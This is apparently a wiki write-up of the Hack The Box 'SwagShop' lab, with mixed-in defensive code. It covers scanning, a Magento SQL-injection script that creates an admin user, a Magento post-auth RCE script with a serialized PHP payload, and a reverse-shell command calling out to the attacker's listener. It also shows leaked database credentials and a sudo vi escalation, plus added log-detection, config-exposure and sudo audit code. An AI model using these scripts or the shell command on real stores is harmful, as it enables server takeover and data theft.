SwagShop

From Luniwiki

SwagShop01.png

Ports scan

u505@kali:~/HTB/Machines/SwagShop$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.140 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-24 20:22:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.140
Discovered open port 80/tcp on 10.10.10.140
u505@kali:~/HTB/Machines/SwagShop$ nmap -sC -sV 10.10.10.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 15:22 EST
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.049s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://10.10.10.140/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds

Web enumeration

u505@kali:~/HTB/Machines/SwagShop$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php,js" -f -t 50 -u http://10.10.10.140

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php, js | HTTP method: get | Threads: 50 | Wordlist size: 18443
Error Log: /opt/utils/dirsearch/logs/errors-20-02-24_15-28-23.log
Target: http://10.10.10.140
[15:28:23] Starting:
[15:28:27] 403 - 300B - /.htpasswd.txt
[15:28:27] 403 - 300B - /.htpasswd.php
[15:28:27] 403 - 299B - /.htpasswd.js
[15:28:27] 403 - 291B - /.php
[15:28:31] 200 - 2KB  - /app/
[15:28:31] 200 - 37B  - /api.php
[15:28:40] 200 - 0B   - /cron.php
[15:28:45] 200 - 2KB  - /errors/
[15:28:52] 403 - 293B - /icons/
[15:28:52] 200 - 946B - /includes/
[15:28:52] 200 - 16KB - /index.php
[15:28:52] 200 - 16KB - /index.php/
[15:28:53] 200 - 44B  - /install.php
[15:28:56] 200 - 3KB  - /lib/
[15:28:56] 200 - 10KB - /LICENSE.txt
[15:28:58] 200 - 2KB  - /media/
[15:29:04] 200 - 1KB  - /pkginfo/
[15:29:11] 403 - 301B - /server-status/
[15:29:12] 200 - 2KB  - /shell/
[15:29:13] 200 - 1KB  - /skin/
[15:29:20] 200 - 2KB  - /var/
Task Completed

Searchsploit

 u505@kali:~/HTB/Machines/SwagShop$ searchsploit magento
------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                           |  Path
                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Userna | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File           | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution             | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                   | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion              | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure                                | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection             | exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Den | exploits/php/webapps/38651.txt
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

SwagShop02.png

The copyright notice is from 2014; https://www.cloudways.com/blog/magento-versions/ indicates that in 2014 the version should be 1.9.x.

SwagShop03.png

Admin user (exploit 37977)

u505@kali:~/HTB/Machines/SwagShop$ searchsploit -m 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/SwagShop/37977.py

If the Magento version is vulnerable, this script creates an admin account with username forme and password forme.

SwagShop04.png

Our admin URL has index.php at the beginning, so the script's target_url is adjusted to include it.

u505@kali:~/HTB/Machines/SwagShop$ vi exploituser.py
u505@kali:~/HTB/Machines/SwagShop$ cat exploituser.py
#Thanks to
# Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON
import requests
import base64
import sys

target = "http://10.10.10.140/"
if not target.startswith("http"):
    target = "http://" + target
if target.endswith("/"):
    target = target[:-1]
# The admin area on this host sits behind index.php
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

# SQL appended to the popularity filter: builds a salted hash (md5(salt+password):salt),
# inserts the admin_user row and attaches it to the administrator role
q = """
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="u505", password="u505")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# ___directive is the base64 of: {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds u505:u505".format(target)
else:
    print "DID NOT WORK"

We run the exploit

u505@kali:~/HTB/Machines/SwagShop$ python exploituser.py
WORKED
Check http://10.10.10.140/admin with creds u505:u505

SwagShop05.png

We log in at the admin portal with user u505 and password u505.

SwagShop06.png

Remote code execution (exploit 37811)

u505@kali:~/HTB/Machines/SwagShop$ searchsploit -m 37811
  Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/SwagShop/37811.py

This script needs an authenticated admin user, which we have from the previous exploit. It also needs the exact install date from /app/etc/local.xml, which this server serves without authentication:

u505@kali:~/HTB/Machines/SwagShop$ curl --no-progress-meter http://10.10.10.140/app/etc/local.xml | grep -A2 "<install>"
       <install>
           <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
       </install>
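The curl above shows the real problem on this host: app/etc/local.xml is readable over HTTP, which leaks the DB credentials and the install date that the dashboard tunnel uses as its signing secret. The following is an added example (not part of the original writeup or of Magento) that a site owner can point at their own store to confirm the file is blocked. It parses a fetched body offline; the sample XML is constructed from the fragments shown on this page, with the DB password replaced by a placeholder.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of a Magento 1 app/etc/local.xml body, shaped like the
# fragments quoted in this writeup. <DB_PASSWORD> is a placeholder.
SAMPLE_LOCAL_XML = """<?xml version="1.0"?>
<config>
    <global>
        <install>
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
        </install>
        <resources>
            <default_setup>
                <connection>
                    <host><![CDATA[localhost]]></host>
                    <username><![CDATA[root]]></username>
                    <password><![CDATA[<DB_PASSWORD>]]></password>
                    <dbname><![CDATA[swagshop]]></dbname>
                    <active>1</active>
                </connection>
            </default_setup>
        </resources>
    </global>
</config>
"""


def audit_local_xml(body):
    """Return [(field, value)] for the sensitive items found in a served local.xml.

    An empty list means the body did not contain a readable Magento config
    (an error page, HTML, or something that is not XML at all).
    """
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return findings
    date = root.find(".//install/date")
    if date is not None and date.text:
        findings.append(("install_date", date.text.strip()))
    conn = root.find(".//connection")
    if conn is not None:
        for field in ("host", "username", "dbname"):
            el = conn.find(field)
            if el is not None and el.text:
                findings.append((field, el.text.strip()))
        pw = conn.find("password")
        if pw is not None and pw.text:
            # never echo the secret itself, only the fact that it was served
            findings.append(("password", "present (%d chars)" % len(pw.text)))
    return findings


def check_store(base_url, timeout=10):
    """Fetch <base_url>/app/etc/local.xml from your own store and audit it.

    Returns (http_status, findings). A 403/404 with no findings is the
    desired result; a 200 with findings means the file is exposed.
    """
    url = base_url.rstrip("/") + "/app/etc/local.xml"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, audit_local_xml(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return e.code, []


if __name__ == "__main__":
    for field, value in audit_local_xml(SAMPLE_LOCAL_XML):
        print("%-13s %s" % (field, value))
```

A non-empty result on a live store means the web server is ignoring the deny rules Magento ships under app/ (typically because AllowOverride is off), and the fix is to deny that directory in the vhost configuration rather than to rely on the .htaccess file.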

Debug

We debug the script with ipython to fix an issue with the login form (the username control already exists, so it must not be added again) and to find a dashboard period for which the response actually contains the chart tunnel URL: with period 7d the store returns "No Data Found" and no image tag, so we use 2y.

In [28]: request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)

In [29]: print request.read()
<div style="margin:20px;"> <p class="switcher a-right" style="padding:5px 10px;">Select Range: <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);"> <option value="24h" >Last 24 Hours</option> <option value="7d" selected="selected">Last 7 Days</option> <option value="1m" >Current Month</option> <option value="1y" >YTD</option> <option value="2y" >2YTD</option> </select></p><br/> <p class="a-center" style="width:587px;height:300px; margin:0 auto;">No Data Found</p> </div>

In [30]: request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)

In [31]: print request.read()
<div style="margin:20px;"> <p class="switcher a-right" style="padding:5px 10px;">Select Range: <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);"> <option value="24h" >Last 24 Hours</option> <option value="7d" >Last 7 Days</option> <option value="1m" >Current Month</option> <option value="1y" >YTD</option> <option value="2y" selected="selected">2YTD</option> </select></p><br/> <p style="width:587px;height:300px; margin:0 auto;"><img src="http://10.10.10.140/index.php/admin/dashboard/tunnel/key/7c135be70c46a2113a2dbc9ab6d59779/?ga=YTo5OntzOjM6ImNodCI7czoyOiJsYyI7czozOiJjaGYiO3M6Mzk6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCI7czozOiJjaG0iO3M6MTQ6IkIsZjRkNGIyLDAsMCwwIjtzOjQ6ImNoY28iO3M6NjoiZGI0ODE0IjtzOjM6ImNoZCI7czoyNDoiZTpBQUFBQUFxcUFBQUFBQUFBQUFBQUFBIjtzOjQ6ImNoeHQiO3M6MzoieCx5IjtzOjQ6ImNoeGwiO3M6NTk6IjA6fHwwMi8yMDE5fHwwNS8yMDE5fHwwOC8yMDE5fHwxMC8yMDE5fHwxMi8yMDE5fHwxOnwwfDF8MnwzIjtzOjM6ImNocyI7czo3OiI1ODd4MzAwIjtzOjM6ImNoZyI7czoyMjoiMTAsMzMuMzMzMzMzMzMzMzMzLDEsMCI7fQ%253D%253D&h=6f7a4c132dd5b15d0f7729b4d61b29d1" alt="chart" title="chart" /></p> </div>

Final script

u505@kali:~/HTB/Machines/SwagShop$ cat exploitrce.py
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none

from hashlib import md5
import sys
import re
import base64
import mechanize


def usage():
    print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" % (sys.argv[0], sys.argv[0])
    sys.exit()


if len(sys.argv) != 3:
    usage()

# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
username = 'u505'
password = 'u505'
php_function = 'system'  # Note: we can only pass 1 argument to the function
#install_date = 'Sat, 15 Nov 2014 20:27:57 +0000'  # This needs to be the exact date from /app/etc/local.xml
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                  len(arg), arg)

# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)

# Log in to the admin panel with the account created by the previous exploit
request = br.open(target)
br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()

# Pull the AJAX block URL and the CSRF form key from the dashboard page
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)

# The 7d period returned "No Data Found" with no chart; 2y has data and exposes the tunnel URL
#request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)

# The tunnel checks h == md5(ga + install_date), so the leaked install date lets us sign the payload
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh

try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    print e.read()

Test execution

u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "uname -a"
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "whoami"
www-data
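Both exploits used so far leave distinctive traces in the web server access log even without the POST body: the unauthenticated POST to the Cms_Wysiwyg directive handler (exploit 37977, the "Shoplift" injection fixed by SUPEE-5344), the dashboard tunnel request carrying a ga= parameter (exploit 37811), and the direct read of app/etc/local.xml. The following is an added Python 3 example, not part of the original writeup, that matches those three request shapes against combined-format log lines. The sample lines are constructed to mirror the requests the scripts above send; the angle-bracket values are placeholders, not captured data.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# (rule name, required method or None, path pattern, required query parameter or None)
RULES = [
    # Exploit 37977: unauthenticated POST to the Cms_Wysiwyg directive handler
    ("magento_cms_wysiwyg_directive", "POST",
     re.compile(r"/admin/Cms_Wysiwyg/directive/index/?", re.I), None),
    # Exploit 37811: chart tunnel fed a serialized PHP object through the ga parameter
    ("magento_dashboard_tunnel_ga", None,
     re.compile(r"/admin/dashboard/tunnel/", re.I), "ga"),
    # Direct read of the config file holding the DB password and install date
    ("magento_local_xml_read", "GET",
     re.compile(r"/app/etc/local\.xml$", re.I), None),
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_rules(entry):
    """Names of the rules an already-parsed entry triggers."""
    parsed = urlparse(entry["url"])
    params = parse_qs(parsed.query)
    hits = []
    for name, method, path_re, required_param in RULES:
        if method and entry["method"] != method:
            continue
        if not path_re.search(parsed.path):
            continue
        if required_param and required_param not in params:
            continue
        hits.append(name)
    return hits


def scan(lines):
    """Return [(client ip, request url, [rule names])] for every matching line."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = match_rules(entry)
        if hits:
            alerts.append((entry["ip"], entry["url"], hits))
    return alerts


# Constructed sample lines shaped like the requests the two exploit scripts send;
# not taken from a real server log. Placeholders are in angle brackets.
SAMPLE_LOG = [
    '10.10.14.30 - - [24/Feb/2020:16:28:38 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 512 "-" "python-requests/2.22.0"',
    '10.10.14.30 - - [24/Feb/2020:16:30:01 +0000] "GET /app/etc/local.xml HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
    '10.10.14.30 - - [24/Feb/2020:22:15:41 +0000] "GET /index.php/admin/dashboard/tunnel/key/<KEY>/?ga=<B64_PAYLOAD>&h=<MD5> HTTP/1.1" 200 12 "-" "Python-urllib/2.7"',
    '10.10.14.31 - - [24/Feb/2020:22:16:00 +0000] "GET /index.php/admin/dashboard/index/key/<KEY>/ HTTP/1.1" 200 16384 "-" "Mozilla/5.0"',
    '10.10.14.32 - - [24/Feb/2020:22:17:00 +0000] "GET /skin/frontend/base/default/css/styles.css HTTP/1.1" 200 33000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, url, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), url)
```

The tunnel rule is deliberately loose: a legitimate dashboard also requests the tunnel with ga= when an admin views charts, so on a real store the useful signal is that request arriving from a client that never loaded the dashboard page, or the Cms_Wysiwyg POST from anyone at all, since that handler is reached without a session.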

Remote shell

u505@kali:~/HTB/Machines/SwagShop$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We launch the exploit

u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 4444 >/tmp/f"

And we have our reverse shell

u505@kali:~/HTB/Machines/SwagShop$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.140.
Ncat: Connection from 10.10.10.140:34256.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@swagshop:/var/www/html$ stty raw -echo
stty raw -echo

User flag

www-data@swagshop:/home/haris$ ls -la
total 36
drwxr-xr-x 3 haris haris 4096 May  8  2019 .
drwxr-xr-x 3 root  root  4096 May  2  2019 ..
-rw------- 1 haris haris   54 May  2  2019 .Xauthority
lrwxrwxrwx 1 root  root     9 May  8  2019 .bash_history -> /dev/null
-rw-r--r-- 1 haris haris  220 May  2  2019 .bash_logout
-rw-r--r-- 1 haris haris 3771 May  2  2019 .bashrc
drwx------ 2 haris haris 4096 May  2  2019 .cache
-rw------- 1 root  root     1 May  8  2019 .mysql_history
-rw-r--r-- 1 haris haris  655 May  2  2019 .profile
-rw-r--r-- 1 haris haris    0 May  2  2019 .sudo_as_admin_successful
-rw-r--r-- 1 haris haris   33 May  8  2019 user.txt
www-data@swagshop:/home/haris$ cat user.txt
<USER_FLAG>

MySQL access

In the Magento configuration file app/etc/local.xml we find the MySQL credentials.

www-data@swagshop:/var/www/html/app/etc$ cat local.xml | grep -A10 "<connection>"
               <connection>
                   <host><![CDATA[localhost]]></host>
                   <username><![CDATA[root]]></username>
                   <password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
                   <dbname><![CDATA[swagshop]]></dbname>
                   <initStatements><![CDATA[SET NAMES utf8]]></initStatements>
                   <model><![CDATA[mysql4]]></model>
                   <type><![CDATA[pdo_mysql]]></type>
                   <pdoType><![CDATA[]]></pdoType>
                   <active>1</active>
               </connection>

We can log into the database

www-data@swagshop:/var/www/html/app/etc$ mysql -u root -p swagshop
mysql -u root -p swagshop
Enter password: fMVWh7bDHpgZkyfqQXreTjU9

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.7.26-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select * from admin_user;
select * from admin_user;
+---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+
| user_id | firstname | lastname | email             | username | password                                                          | created             | modified            | logdate             | lognum | reload_acl_flag | is_active | extra | rp_token | rp_token_created_at |
+---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+
|       1 | Haris     | Swagger  | haris@htbswag.net | haris    | 8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp | 2019-05-08 07:23:09 | 2019-05-08 07:23:09 | 2019-08-27 07:04:13 |     13 |               0 |         1 | N;    | NULL     | NULL                |
|       2 | Firstname | Lastname | email@example.com | u505     | 07ca45d11f9f28280459ba9b6afb72f9:rp                               | 2020-02-24 16:28:38 | NULL                | 2020-02-24 22:15:41 |      6 |               0 |         1 | N;    | NULL     | 2020-02-24 16:28:38 |
+---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+
2 rows in set (0.00 sec)

mysql> quit
quit
Bye
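The two admin_user rows tell the whole story of the first exploit: the real account has a 32-character salt, a populated modified column and a store email, while the injected one has the 2-character salt the SQL hard-coded, modified NULL, placeholder names and an example.com address. The following is an added example, not part of the original writeup, showing the Magento 1 hash scheme (md5(salt + password) followed by ":" and the salt) and an audit that flags admin rows which do not look UI-created. The rows are transcribed from the query output above; the expected salt length is an assumption taken from the known-good account on this install.

```python
import hashlib


def magento1_hash(password, salt):
    """Magento 1 admin password format: md5(salt + password) + ":" + salt.

    This is exactly what the injected SQL above built with
    CONCAT(MD5(CONCAT(@SALT, pw)), ':', @SALT).
    """
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def magento1_verify(password, stored):
    """Check a candidate password against a stored admin_user.password value."""
    digest, sep, salt = stored.partition(":")
    if not sep:  # legacy unsalted md5
        return hashlib.md5(password.encode()).hexdigest() == stored
    return magento1_hash(password, salt) == stored


PLACEHOLDER_NAMES = {"firstname", "lastname", "admin", "test", "user"}


def audit_admin_users(rows, expected_salt_len=32):
    """Return {user_id: [reasons]} for rows that do not look like they were
    created through the admin UI.

    expected_salt_len is an assumption: take it from a known-good account on
    the same install (the haris row here has a 32-character salt).
    """
    findings = {}
    for row in rows:
        reasons = []
        digest, sep, salt = row["password"].partition(":")
        if not sep:
            reasons.append("unsalted md5 hash")
        elif len(salt) != expected_salt_len:
            reasons.append("salt length %d, expected %d" % (len(salt), expected_salt_len))
        if row.get("modified") is None:
            reasons.append("modified is NULL")
        if {row["firstname"].lower(), row["lastname"].lower()} & PLACEHOLDER_NAMES:
            reasons.append("placeholder first/last name")
        if row["email"].lower().endswith("@example.com"):
            reasons.append("example.com email")
        if reasons:
            findings[row["user_id"]] = reasons
    return findings


# The two admin_user rows from the query above, transcribed by hand
# (only the columns the audit uses).
ADMIN_USERS = [
    {"user_id": 1, "firstname": "Haris", "lastname": "Swagger", "email": "haris@htbswag.net",
     "username": "haris",
     "password": "8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp",
     "created": "2019-05-08 07:23:09", "modified": "2019-05-08 07:23:09"},
    {"user_id": 2, "firstname": "Firstname", "lastname": "Lastname", "email": "email@example.com",
     "username": "u505",
     "password": "07ca45d11f9f28280459ba9b6afb72f9:rp",
     "created": "2020-02-24 16:28:38", "modified": None},
]

if __name__ == "__main__":
    for user_id, reasons in audit_admin_users(ADMIN_USERS).items():
        print("admin_user %d: %s" % (user_id, "; ".join(reasons)))
```

On a store that is suspected of having been hit by this injection, running the audit against a dump of admin_user (and checking admin_role for rows whose role_name matches a firstname, as the injected SQL sets it) is a quicker triage than reading every row by eye.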

Escalation of privileges

sudo

www-data@swagshop:/var/www$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

User www-data can run vi as root, without a password, on any path under /var/www/html. Since vi can run shell commands with :!, this is enough for a root shell.
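A sudo rule like this one is easy to spot if you know what to look for: an editor or pager (anything with a shell escape) combined with NOPASSWD and a wildcard argument. The following is an added example, not part of the original writeup, that parses `sudo -l` output and reports those patterns; the binary list is a small, non-exhaustive set chosen for illustration, and the sample input is the output shown above re-typed in the layout sudo normally prints.

```python
import re

# Binaries that hand the caller a shell or arbitrary file access once run
# under sudo (vi/vim via :!, less/more via !, interpreters directly).
# Assumption: a short illustrative list, not a complete one.
SHELL_ESCAPE_BINARIES = {
    "vi", "vim", "view", "nano", "less", "more", "man",
    "awk", "perl", "python", "python3", "find", "env", "sh", "bash",
}

# "(root) NOPASSWD: /usr/bin/vi /var/www/html/*"  ->  runas, tags, command
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(output):
    """Return [(runas, nopasswd, command)] from the text `sudo -l` prints."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            # tolerate the first rule being glued onto the header line
            line = line.split(":", 1)[1].strip()
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas"), "NOPASSWD" in m.group("tags"), m.group("cmd").strip()))
    return rules


def audit_rule(runas, nopasswd, cmd):
    """Reasons a single rule is risky; empty list if nothing stands out."""
    if cmd == "ALL":
        return ["ALL commands as %s" % runas] + (["NOPASSWD: no credential needed"] if nopasswd else [])
    reasons = []
    parts = cmd.split()
    binary = parts[0].rsplit("/", 1)[-1]
    if binary in SHELL_ESCAPE_BINARIES:
        reasons.append("%s can spawn a shell (e.g. :! in vi) or read/write arbitrary files" % binary)
    if any(ch in arg for arg in parts[1:] for ch in "*?["):
        # sudoers argument wildcards also match '/', so more paths and extra
        # arguments satisfy the rule than the author probably intended
        reasons.append("wildcard in argument: matches paths outside the intended directory and extra arguments")
    if reasons and nopasswd:
        reasons.append("NOPASSWD: no credential needed")
    return reasons


def audit_sudo_l(output):
    """[(command, [reasons])] for every rule in a `sudo -l` listing."""
    return [(cmd, audit_rule(runas, nopasswd, cmd)) for runas, nopasswd, cmd in parse_sudo_l(output)]


# The `sudo -l` output from above, re-typed in the layout sudo normally uses.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
"""

if __name__ == "__main__":
    for cmd, reasons in audit_sudo_l(SUDO_L_OUTPUT):
        print(cmd, "->", "; ".join(reasons) or "ok")
```

The mitigation for a rule like this is not a better wildcard but a different design: give the web user a dedicated deploy mechanism, or at minimum use sudoedit (which copies the file, edits it as the calling user, and never runs the editor as root) on an explicit file list.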

Run shell from vi

